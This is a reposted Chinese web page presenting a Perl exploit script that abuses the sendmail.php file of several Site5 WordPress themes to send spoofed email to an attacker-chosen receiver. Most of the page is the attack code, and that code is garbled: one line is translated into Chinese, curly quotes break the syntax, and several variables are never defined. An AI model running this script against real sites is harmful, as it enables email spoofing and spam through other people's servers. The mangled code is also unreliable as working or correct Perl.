当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

Site5 WordPress电子邮件欺骗漏洞

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

以下是利用本地搭建的site5 wordpress
 
漏洞文件:
diary, simploblack, simplo, journalcrunch, boldy, webfolio
my $theme = ‘diary’;
my $url = $wordpress.’wp-content/themes/’.$theme.’/sendmail.php’;
我的电子邮件=“test.five@yahoo.cn;
#Receiver email address
my $receiver = ‘test.five@yahoo.cn’;
$receiver =~ s/(.)/sprintf(“%x”,ord($1))/eg;
my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print “Sending request to $url\n”;
my $content = $ua->request($request)->as_string();
print $content;
print “\nDone\nFollow \@BallastSec on Twitter\n”; ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1